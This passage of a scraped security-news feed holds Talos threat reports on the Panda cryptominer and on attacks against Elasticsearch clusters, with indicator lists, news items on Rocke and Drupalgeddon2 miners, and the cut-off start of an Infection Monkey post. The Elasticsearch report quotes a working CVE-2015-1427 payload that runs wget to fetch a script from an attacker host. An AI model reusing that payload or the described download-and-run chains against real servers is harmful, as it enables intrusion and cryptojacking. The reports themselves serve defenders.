This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords \n \nIn June, Panda began targeting a newer WebLogic vulnerability, [CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>), but their TTPs remained the same. \n \n\n\n## Recent activity\n\nPanda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of \"a\" - \"z\" characters and the last five consisting of digits (e.g., \"xblzcdsafdmqslz19595.exe\"). Panda then executes the file via PowerShell. 
Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se. \n \nBesides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz. \n \nOne difference is that several samples contained a Gh0st RAT default mutex \"DOWNLOAD_SHELL_MUTEX_NAME\" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior. \n \nOn August 19, 2019, we observed that Panda has added another set of domains to his inventory of C2 and payload-hosting infrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as \"BBBBB,\", instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18. \n \nIn line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to \"oo[.]mygoodluck[.]best:51888:WervPoxySvc\", and made a DNS request for this domain. 
The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club. \n \nCisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best. \n\n\n[](<https://1.bp.blogspot.com/-2-PgtrQPKAE/XYDgeQ-XHeI/AAAAAAAAB8Q/2AJE3Rk0IHURq9oeqIjqMw-Ft37AHxp_ACLcBGAsYHQ/s1600/image1.png>)\n\n[](<https://1.bp.blogspot.com/-uPJKV52J9K0/XYDgjBhDZaI/AAAAAAAAB8U/sfPHOODu5c8pmRVRrcPdlaQ6G-VnpW9VQCLcBGAsYHQ/s1600/image3.png>)\n\n## \n\n\n## Conclusion\n\nPanda's operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated. \n \nHowever, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time they sold. \n \nPanda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and is quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. 
And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their activity in order to thwart their operations. \n\n\n## \n\n\n## COVERAGE\n\nFor coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://talosintelligence.com/resources/65>) \n \n\n\n[](<https://1.bp.blogspot.com/-VoLoSQumND8/XYDgUqa4CvI/AAAAAAAAB8I/dQAoulvM4nofqrokMtgPSQZJYLLOLLmZwCLcBGAsYHQ/s1600/image2.png>)\n\nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nNetwork Security appliances such as[ Next-Generation Firewall (NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. 
\n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n\n\n## IOCs\n\n### Domains\n\na45[.]bulehero[.]in \na46[.]bulehero[.]in \na47[.]bulehero[.]in \na48[.]bulehero[.]in \na88[.]bulehero[.]in \na88[.]heroherohero[.]info \na[.]bulehero[.]in \naic[.]fxxxxxxk[.]me \naxx[.]bulehero[.]in \nb[.]bulehero[.]in \nbulehero[.]in \nc[.]bulehero[.]in \ncb[.]fuckingmy[.].life \ncnm[.]idc3389[.]top \ndown[.]idc3389[.]top \nfid[.]hognoob[.]se \nfxxk[.]noilwut0vv[.]club \nhaq[.]hognoob[.]se \nidc3389[.]top \nidc3389[.]cc \nidc3389[.]pw \nli[.]bulehero2019[.]club \nlist[.]idc3389[.]top \nmi[.]oops[.]best \nmx[.]oops[.]best \nnrs[.]hognoob[.]se \noo[.]mygoodluck[.]best \npool[.]bulehero[.]in \npxi[.]hognoob[.]se \npxx[.]hognoob[.]se \nq1a[.]hognoob[.]se \nqie[.]fxxxxxxk[.]me \nrp[.]oiwcvbnc2e[.]stream \nuio[.]heroherohero[.]info \nuio[.]hognoob[.]se \nupa1[.]hognoob[.]se \nupa2[.]hognoob[.]se \nwiu[.]fxxxxxxk[.]me \nyxw[.]hognoob[.]se \nzik[.]fxxxxxxk[.]me \n\n\n### IPs\n\n184[.]168[.]221[.]47 \n172[.]104[.]87[.]6 \n139[.]162[.]123[.]87 \n139[.]162[.]110[.]201 \n116[.]193[.]154[.]122 \n95[.]128[.]126[.]241 \n195[.]128[.]127[.]254 \n195[.]128[.]126[.]120 \n195[.]128[.]126[.]243 \n195[.]128[.]124[.]140 \n139[.]162[.]71[.]92 \n3[.]123[.]17[.]223 \n46[.]173[.]217[.]80 \n5[.]56[.]133[.]246 \n\n\n### SHA-256\n\n2df8cfa5ea4d63615c526613671bbd02cfa9ddf180a79b4e542a2714ab02a3c1 \nfa4889533cb03fc4ade5b9891d4468bac9010c04456ec6dd8c4aba44c8af9220 \n2f4d46d02757bcf4f65de700487b667f8846c38ddb50fbc5b2ac47cfa9e29beb \n829729471dfd7e6028af430b568cc6e812f09bb47c93f382a123ccf3698c8c08 \n8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec 
\n1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27 \n0697127fb6fa77e80b44c53d2a551862709951969f594df311f10dcf2619c9d5 \nf9a972757cd0d8a837eb30f6a28bc9b5e2a6674825b18359648c50bbb7d6d74a \n34186e115f36584175058dac3d34fe0442d435d6e5f8c5e76f0a3df15c9cd5fb \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n3ed90f9fbc9751a31bf5ab817928d6077ba82113a03232682d864fb6d7c69976 \na415518642ce4ad11ff645151195ca6e7b364da95a8f89326d68c836f4e2cae1 \n4d1f49fac538692902cc627ab7d9af07680af68dd6ed87ab16710d858cc4269c \n8dea116dd237294c8c1f96c3d44007c3cd45a5787a2ef59e839c740bf5459f21 \n991a9a8da992731759a19e470c36654930f0e3d36337e98885e56bd252be927e \na3f1c90ce5c76498621250122186a0312e4f36e3bfcfede882c83d06dd286da1 \n9c37a6b2f4cfbf654c0a5b4a4e78b5bbb3ba26ffbfab393f0d43dad9000cb2d3 \nd5c1848ba6fdc6f260439498e91613a5db8acbef10d203a18f6b9740d2cab3ca \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n6d5479adcfa4c31ad565ab40d2ea8651bed6bd68073c77636d1fe86d55d90c8d \n\n\n### Monero Wallets\n\n49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi 1198.851653275126 \n4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh \n44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L \n \n", "modified": "2019-09-17T08:09:45", "published": "2019-09-17T08:09:45", "id": "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3w3NM3N6VuY/panda-evolution.html", "type": "talosblog", "title": "Cryptocurrency miners aren\u2019t dead yet: Documenting the voracious but simple \u201cPanda\u201d", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-03-01T16:16:02", "bulletinFamily": "blog", "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-1273", "CVE-2018-7600"], "description": "__ \n \n_[Christopher 
Evans](<https://twitter.com/ccevans002>) of Cisco Talos conducted the research for this post._ \n \n\n\n## Executive Summary\n\n \nCisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. We have recently observed a spike in attacks from multiple threat actors targeting these clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines. Talos has also been able to identify social media accounts associated with one of these threat actors. Because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster could be devastating due to the amount of data present. This post details the attack methods used by each threat actor, as well as the associated payloads. \n \n\n\n## Introduction\n\n \nThrough ongoing analysis of honeypot traffic, Talos detected an increase in attacks targeting unsecured Elasticsearch clusters. These attacks leverage CVE-2014-3120 and CVE-2015-1427, both of which are only present in old versions of Elasticsearch and exploit the ability to pass scripts to search queries. Based on patterns in the payloads and exploit chains, Talos assesses with moderate confidence that six distinct actors are exploiting our honeypots. \n \nFor example CVE-2015-1427: \n\n\n> { \n \"size\": 1, \n \"script_fields\": { \n \"lupin\": { \n \"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"wget http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh -P /tmp/sssooo\\\").getText()\" \n } \n } \n}\n\n \nThe most active of these actors consistently deploys two distinct payloads with the initial exploit, always using CVE-2015-1427. 
The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget. This is likely an attempt to make the exploit work on a broader variety of platforms. The bash script utilized by the attacker follows a commonly observed pattern of disabling security protections and killing a variety of other malicious processes (primarily other mining malware), before placing its RSA key in the authorized_keys file. Additionally, this bash script serves to download illicit miners and their configuration files. The script achieves persistence by installing shell scripts as cron jobs. \n \nThis bash script also downloads a UPX-packed ELF executable. Analysis of the unpacked sample reveals that this executable contains exploits for a variety of other systems. These additional exploits include several vulnerabilities, all of which could lead to remote code execution, such as CVE-2018-7600 in Drupal, CVE-2017-10271 in Oracle WebLogic, and CVE-2018-1273 in Spring Data Commons. The exploits are sent, typically via HTTPS, to the targeted systems. As evidenced by each of these exploits, the attacker's goal appears to be obtaining remote code execution on targeted machines. Detailed analysis of the payload sample is ongoing, and Talos will provide pertinent updates as necessary. \n \nTalos observed a second actor exploiting CVE-2014-3120, using it to deliver a payload that is derivative of the Bill Gates distributed denial-of-service malware. The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners. \n \nA third actor attempts to download a file named \"LinuxT\" from an HTTP file server using exploits targeting CVE-2014-3120. 
The LinuxT file is no longer hosted on the command and control (C2) server despite continued exploits requesting the file, although several other malicious files are still being hosted. All of these files are detected by ClamAV as variants of the Spike trojan and are intended to run on x86, MIPS and ARM architectures. \n \nAs part of our research, we observed that, in some cases, hosts that attempted to download the \"LinuxT\" sample also dropped payloads that executed the command \"echo 'qq952135763.'\" This behavior has been seen in elastic search error logs going back several years. QQ is a popular Chinese social media website, and it is possible that this is referencing a QQ account. We briefly reviewed the public account activity of 952135763 and found several posts related to cybersecurity and exploitation, but nothing specific to this activity. While this information could potentially shed more light on the attacker, there is insufficient information currently to draw any firm conclusions. \n \n \n\n\n_\"About Me\" page of the attacker's personal website linking to the same QQ account number as in the command above._\n\n \n\n\nThis website also links to the potential attacker's Gitee page. Gitee is a Chinese code-sharing website similar to Github or Atlassian. \n \n \n\n\n_Attacker's Gitee page._\n\n \n\n\nAlthough the projects associated with this Gitee profile are not explicitly malicious, Talos has linked this QQ account to a profile on Chinese hacking forum xiaoqi7, as well as a history of posts on topics related to exploits and malware on other forums. We briefly reviewed the public account activity of 952135763 and found several posts related to cyber security and exploitation, but nothing specific to this activity. While this information could tell us more about the attacker, there is insufficient information currently to draw any firm conclusions. 
\n \nOur honeypots also detected additional hosts exploiting Elasticsearch to drop payloads that execute both \"echo 'qq952135763'\" and \"echo '952135763,'\" suggesting that the attacks are related to the same QQ account. However, none of the IPs associated with these attacks have been observed attempting to download the \"LinuxT\" payload linked to this attacker. Additionally, unlike other activity associated with this attacker, these attacks leveraged the newer Elasticsearch vulnerability rather than the older one. \n \nThe three remaining actors that Talos identified have not been observed delivering any malware through their exploits. One actor issued an \"rm *\" command, while the other two actors were fingerprinting vulnerable servers by issuing 'whoami' and 'id' commands. \n \n\n\n## Conclusion\n\n \nTalos has observed multiple attackers exploiting CVE-2014-3120 and CVE-2015-1427 in our Elasticsearch honeypots to drop a variety of malicious payloads. Additionally, Talos has identified some social media accounts we believe could belong to the threat actor dropping the \"LinuxT\" payload. These Elasticsearch vulnerabilities only exist in versions 1.4.2 and lower, so any cluster running a modern version of Elasticsearch is unaffected by these vulnerabilities. Given the size and sensitivity of the data sets these clusters contain, the impact of a breach of this nature could be severe. Talos urges readers to patch and upgrade to a newer version of Elasticsearch if at all possible. Additionally, Talos highly recommends disabling the ability to send scripts through search queries if that ability is not strictly necessary for your use cases. \n \n\n\n## Coverage\n\n \nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. 
For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \n**CVE-2014-3120:** 33830, 36256, 44690 \n \n**CVE-2015-1427:** 33814,36067 \n \n**CVE-2017-10271:** 45304 \n \n**CVE-2018-7600:** 46316 \n \n**CVE-2018-1273:** 46473 \n \nAdditional ways our customers can detect and block this threat are listed below. \n \n \nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nEmail Security can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat. \n \nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. \n \nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. 
\n \n\n\n## IOCs:\n\n \n**First Actor:** \n \n**Attacking IP addresses:** \n \n101[.]200[.]48[.]68 \n117[.]205[.]7[.]194 \n107[.]182[.]183[.]206 \n124[.]43[.]19[.]159 \n139[.]99[.]131[.]57 \n179[.]50[.]196[.]228 \n185[.]165[.]116[.]144 \n189[.]201[.]192[.]242 \n191[.]189[.]30[.]112 \n192[.]210[.]198[.]50 \n195[.]201[.]169[.]194 \n216[.]15[.]146[.]34 \n43[.]240[.]65[.]121 \n45[.]76[.]136[.]196 \n45[.]76[.]178[.]34 \n52[.]8[.]60[.]118 \n54[.]70[.]161[.]251 \n139[.]159[.]218[.]82 \n \n**IP addresses and ports hosting malware:** \n \n45[.]76[.]122[.]92:8506 \n207[.]148[.]70[.]143:8506 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 e2f1be608c2cece021e68056f2897d88ed855bafd457e07e62533db6dfdc00dc \n191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c \n2bcc9fff40053ab356ddde6de55077f8bf83d8dfa6d129c250f521eb170dc123 \n9a181c6a1748a9cfb46751a2cd2b27e3e742914873de40402b5d40f334d5448c 5fe3b0ba0680498dbf52fb8f0ffc316f3a4d7e8202b3ec710b2ae63e70c83b90 \n7b08a8dae39049aecedd9679301805583a77a4271fddbafa105fa3b1b507baa3 \n \n**Second Actor:** \n \n**Attacking IP address:** \n \n202[.]109[.]143[.]110 \n \n**IP address and port hosting malware:** \n \n216[.]176[.]179[.]106:9090 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 \n \n**Third Actor:** \n \n**Attacking IP addresses:** \n \n125[.]231[.]139[.]75 \n36[.]235[.]171[.]244 \n \n**IP addresses linked to QQ account, but not delivering malware:** \n \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n**IP address and port hosting malware:** \n \n104[.]203[.]170[.]198:5522 \n \n**SHA256 of malware hosted on above IP address:** \n \n7f18c8beb8e37ce41de1619b2d67eb600ace062e23ac5a5d9a9b2b3dfaccf79b dac92c84ccbb88f058b61deadb34a511e320affa7424f3951169cba50d700500 e5a04653a3bfbac53cbb40a8857f81c8ec70927a968cb62e32fd36143a6437fc d3447f001a6361c8454c9e560a6ca11e825ed17f63813074621846c43d6571ba 
709d04dd39dd7f214f3711f7795337fbb1c2e837dddd24e6d426a0d6c306618e 830db6a2a6782812848f43a4e1229847d92a592671879ff849bc9cf08259ba6a \n \n**Remaining actors:** \n \n**Attacking IP addresses:** \n \n111[.]19[.]78[.]4 \n15[.]231[.]235[.]194 \n221[.]203[.]81[.]226 \n111[.]73[.]45[.]90 \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n\n\n", "modified": "2019-03-01T15:56:50", "published": "2019-02-26T10:56:00", "id": "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uGLhJU8rCm8/cisco-talos-honeypot-analysis-reveals.html", "type": "talosblog", "title": "Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "thn": [{"lastseen": "2021-02-01T12:26:49", "bulletinFamily": "info", "cvelist": ["CVE-2016-3088", "CVE-2017-10271"], "description": "[](<https://thehackernews.com/images/-QW-VuiqP65I/YBfiIyrUF2I/AAAAAAAABpg/3YIgJQiDql0yh7jOStv7rboKaQhJ5jHPQCLcBGAsYHQ/s0/malware.jpg>)\n\nA financially-motivated threat actor notorious for its cryptojacking attacks has leveraged a revised version of their malware to target cloud infrastructures using vulnerabilities in web server technologies, according to new research.\n\nDeployed by the China-based cybercrime group **Rocke**, the Pro-Ocean cryptojacking malware now comes with improved rootkit and worm capabilities, as well as harbors new evasion tactics to sidestep cybersecurity companies' detection methods, Palo Alto Networks' Unit 42 researchers [said](<https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/>) in a Thursday write-up.\n\n[](<https://go.thn.li/password-auditor> \"password auditor\" )\n\n\"Pro-Ocean uses known vulnerabilities to target cloud applications,\" the researchers detailed. 
\"In our analysis, we found Pro-Ocean targeting Apache ActiveMQ ([CVE-2016-3088](<https://nvd.nist.gov/vuln/detail/CVE-2016-3088>)), Oracle WebLogic ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and Redis (unsecure instances).\"\n\n\"Once installed, the malware kills any process that uses the CPU heavily, so that it's able to use 100% of the CPU and mine Monero efficiently.\"\n\nFirst documented by [Cisco Talos](<https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html>) in 2018, Rocke has been found to distribute and execute crypto-mining malware using a varied toolkit that includes Git repositories and different payloads such as shell scripts, JavaScript backdoors, as well as portable executable files.\n\n[](<https://thehackernews.com/images/-zGuFNfU5HYA/YBfio2D1i3I/AAAAAAAABpo/peoOu7OnqKUPriJPrJfEV-QX12XX4jSRwCLcBGAsYHQ/s0/cyber.jpg>)\n\nWhile prior variants of the malware banked on the capability to target and remove cloud security products developed by Tencent Cloud and Alibaba Cloud by [exploiting flaws](<https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/>) in Apache Struts 2, Oracle WebLogic, and Adobe ColdFusion, Pro-Ocean has expanded the breadth of those attack vectors by aiming at Apache ActiveMQ, Oracle WebLogic, and Redis servers.\n\nBesides its self-spreading features and better hiding techniques that allow it to stay under the radar and spread to unpatched software on the network, the malware, once installed sets about uninstalling monitoring agents to dodge detection and removing other malware and miners from the infected systems.\n\nTo achieve this, it takes advantage of a native Linux feature called LD_PRELOAD to mask its malicious activity, a library named [Libprocesshider](<https://github.com/gianlucaborello/libprocesshider>) to stay hidden, and uses a Python infection script that takes the machine's public IP to infect all machines 
in the same 16-bit subnetwork (e.g., 10.0.X.X).\n\nPro-Ocean also works to eliminate competition by killing other malware and miners, including Luoxk, BillGates, XMRig, and Hashfish, running on the compromised host. In addition, it comes with a watchdog module written in Bash that ensures persistence and takes care of terminating all processes that utilize more than 30% of the CPU with the goal of mining Monero efficiently.\n\n\"This malware is an example that demonstrates that cloud providers' agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,\" Unit 42 researcher Aviv Sasson said. \"This sample has the capability to delete some cloud providers' agents and evade their detection.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-02-01T11:15:16", "published": "2021-02-01T11:15:00", "id": "THN:EEB3BA59922DDC6B345B8E6C153593DA", "href": "https://thehackernews.com/2021/02/new-cryptojacking-malware-targeting.html", "type": "thn", "title": "New Cryptojacking Malware Targeting Apache, Oracle, Redis Servers", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-04-18T13:41:28", "bulletinFamily": "info", "cvelist": ["CVE-2018-7600", "CVE-2017-10271"], "description": "[](<https://1.bp.blogspot.com/-zMSVUp45Ep4/WtcTP9bdJsI/AAAAAAAAwTg/e-HDb99w0307p9aEkp1TPTePjTvSe7JRQCLcBGAs/s1600-e20/drupalgeddon-exploit.png>)\n\nThe Drupal vulnerability (CVE-2018-7600), dubbed [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) that could allow attackers to completely take over vulnerable websites has now been exploited in the wild to deliver malware backdoors and cryptocurrency miners. 
\n \nDrupalgeddon2, a highly critical remote code execution vulnerability discovered two weeks ago in Drupal content management system software, was recently patched by the company without releasing its technical details. \n \nHowever, just a day after security researchers at Check Point and Dofinity published complete details, a Drupalgeddon2 proof-of-concept (PoC) [exploit code](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) was made widely available, and large-scale Internet scanning and exploitation attempts followed. \n \nAt the time, no incident of targets being hacked was reported, but over the weekend, several security firms noticed that attackers have now started exploiting the vulnerability to install cryptocurrency miner and other malware on vulnerable websites. \n \nThe SANS Internet Storm Center [spotted](<https://isc.sans.edu/forums/diary/A+Review+of+Recent+Drupal+Attacks+CVE20187600/23563/>) some attacks to deliver a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl. \n\n\n[](<https://1.bp.blogspot.com/-cgGXAVXKeKc/WtcOhdYr0iI/AAAAAAAAwTQ/gXhXTplYR4oUU-jDAmOdEpSV_ZIIDPweACLcBGAs/s1600-e20/drupal-website-hacking.png>)\n\nThe simple PHP backdoor allows attackers to upload additional files (backdoors) to the targeted server. \n \nA thread on SANS ISC Infosec forums also [suggests](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>) that Drupalgeddon2 is being used to install the XMRig Monero miner on vulnerable websites. Besides the actual XMRig miner, the malicious script also downloads additional files, including a script to kill competing miners on the targeted system. 
\n \nResearchers from security firm Volexity have also [observed](<https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/>) a wide variety of actions and payloads attempted via the public exploit for Drupalgeddon2 to deliver malicious scripts that install backdoors and cryptocurrency miners on the vulnerable sites. \n \nThe researchers believed that one of the Monero miner campaigns, delivering XMRig, is associated with a criminal group that exploited the vulnerability (CVE-2017-10271) in Oracle WebLogic servers to deliver cryptocurrency miner malware shortly after its PoC exploit code was made public in late 2017. \n\n\n[](<https://1.bp.blogspot.com/-cWUncg7VBfo/WtcN9yL7mTI/AAAAAAAAwTI/--A-g7ptWeIueY8TO5tvLWL1aijI9OAjgCLcBGAs/s1600-e20/drupal-hacking.png>)\n\nVolexity identified some of the group's wallets that had stored a total of 544.74 XMR (Monero coin), which is equivalent to almost $105,567. \n \nAs we reported in our previous article, Imperva stats [showed](<https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/>) that 90% of the Drupalgeddon2 attacks are simply IP scanning in an attempt to find vulnerable systems, 3% are backdoor infection attempts, and 2% are attempting to run crypto miners on the targets. \n \nFor those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations under the privileges of the user, affecting all versions of Drupal from 6 to 8. \n \nTherefore, site admins were highly recommended to patch the issue by updating their CMS to Drupal 7.58 or Drupal 8.5.1 as soon as possible. 
\n\n\n> In its advisory, Drupal [warned](<https://www.drupal.org/psa-2018-002>) that \"sites not patched by Wednesday, 2018-04-11 may be compromised\" and \"simply updating Drupal will not remove backdoors or fix compromised sites.\"\n\nMoreover, \n\n\n> \"If you find that your site is already patched, but you didn\u2019t do it, that can be a symptom that the site was compromised. Some attacks in the past have applied the patch as a way to guarantee that only that attacker is in control of the site.\"\n\nHere's a guide Drupal team suggest to follow [if your website has been hacked](<https://www.drupal.org/node/2365547>).\n", "modified": "2018-04-18T09:50:03", "published": "2018-04-17T22:49:00", "id": "THN:F03064A70C65D9BD62A8F5898BA276D2", "href": "https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html", "type": "thn", "title": "Hackers Exploiting Drupal Vulnerability to Inject Cryptocurrency Miners", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "pentestit": [{"lastseen": "2018-12-03T23:18:27", "bulletinFamily": "blog", "cvelist": ["CVE-2017-10271", "CVE-2017-5638"], "description": "PenTestIT RSS Feed\n\nI'm sure you must have read my previous post title the [List of Adversary Emulation Tools](<http://pentestit.com/adversary-emulation-tools-list/>). In that post, I briefly mentioned about the Guardicore Infection Monkey. Good news now is that it has been updated! We now have **Infection Monkey 1.6.1**. An important change about this version is that this is an AWS only version.\n\n[](< http://pentestit.com/update-infection-monkey-1-6-1/>) \n\n\nWhat is Infection Monkey?\n\n> The Infection Monkey is an open source Breach and Attack Simulation (BAS) tool that assesses the resiliency of private and public cloud environments to post-breach attacks and lateral movement. 
It operates in much the same way a real attacker would - starting from a random location in the network and propagating from there, while looking for all possible paths of exploitation.\n\n## Infection Monkey 1.6.1 Changes:\n\nInfection Monkey 1.6.1 has now been integrated with the AWS Security Hub. This allows anyone to verify and test the resilience of their AWS environment and correlate this information with the native security solutions and benchmark score!\n\nAdditionally, I missed posting about another release - **Infection Monkey 1.6** which is also important. Hence, I'm posting about it here:\n\n## Infection Monkey 1.6 Change Log:\n\n**New Features:**\n\n * Detect cross segment traffic! The Monkey can now easily test whether two network segments are properly separated. PR [#120](<https://github.com/guardicore/monkey/pull/120>).\n * The Monkey can analyse your domain for possible Pass the Hash attacks. By cross referencing information collected by Mimikatz, the Monkey can now detect usage of identical passwords, cached logins with access to critical servers and more. [#170](<https://github.com/guardicore/monkey/pull/170>)\n * SSH key stealing. 
